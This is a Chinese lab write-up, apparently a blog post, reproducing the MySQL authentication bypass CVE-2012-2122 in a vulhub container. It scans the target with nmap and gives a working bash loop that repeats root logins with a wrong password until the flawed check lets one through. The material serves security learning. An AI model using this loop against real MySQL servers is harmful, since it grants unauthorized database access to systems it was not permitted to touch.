CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入
使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开
docker ps   展示所有正在使用的容器
docker stop +容器的id   关闭容器

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-06-18 22:28:02       98 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-06-18 22:28:02       106 阅读
  3. 在Django里面运行非项目文件

    2024-06-18 22:28:02       87 阅读
  4. Python语言-面向对象

    2024-06-18 22:28:02       96 阅读

热门阅读

  1. C#心跳机制的服务器(完整)

    2024-06-18 22:28:02       34 阅读
  2. 网络安全--安全设备(一)Dos

    2024-06-18 22:28:02       28 阅读
  3. ARP攻击和DNS攻击有什么区别

    2024-06-18 22:28:02       28 阅读
  4. 加密excel(Python)

    2024-06-18 22:28:02       31 阅读
  5. IPV6单播和多播地址

    2024-06-18 22:28:02       25 阅读
  6. ros1转ros2的注意事项

    2024-06-18 22:28:02       24 阅读
  7. 有限自动机解释和应用案例

    2024-06-18 22:28:02       24 阅读
  8. ROM 和 RAM

    2024-06-18 22:28:02       26 阅读
  9. mysql_ssl_rsa_setup使用详解

    2024-06-18 22:28:02       30 阅读
  10. 【OpenCV 基础知识 22】扩展边界并填充

    2024-06-18 22:28:02       31 阅读
  11. 05-5.5.1 哈夫曼树

    2024-06-18 22:28:02       29 阅读
  12. 01-GIt

    01-GIt

    2024-06-18 22:28:02      27 阅读
  13. 部署YUM仓库及NFS共享服务

    2024-06-18 22:28:02       26 阅读
  14. Linux CFS 调度器 (1):概述

    2024-06-18 22:28:02       28 阅读
  15. 语言中 函数用地址传参的好处

    2024-06-18 22:28:02       35 阅读